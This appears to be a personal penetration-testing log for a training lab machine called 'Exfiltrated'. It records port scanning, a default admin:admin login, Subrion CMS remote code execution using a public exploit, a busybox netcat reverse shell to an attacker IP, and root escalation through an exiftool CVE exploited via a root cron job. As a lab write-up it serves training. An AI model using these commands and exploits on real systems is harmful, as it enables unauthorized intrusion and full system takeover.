Exfiltrated
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: Exfiltrated
- IP Address: 192.168.215.163
- Operating System: Linux
ip=192.168.215.163
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan -url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
found login page and login with credential:
admin:admin
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE
python3 SubrionRCE.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
Stabilize the shell using busybox nc
busybox nc 192.168.45.163 80 -e sh
nc -lvnp 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: www-data
- Shell Type: web shell
๐ Enumeration
Scheduled Tasks:
cat /etc/crontab
found
* * * * * root bash /opt/image-exif.sh
cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Public exploit
- Target Binary/Service: exiftool
- Reference / Source: http://github.com/UNICORDev/exploit-CVE-2021-22204
๐ง Exploit Steps
- Setup
python3 exploit-CVE-2021-22204.py -s 192.168.45.163 22
wget http://192.168.45.163:8000/image.jpg
- Smash to root
nc -lvnp 22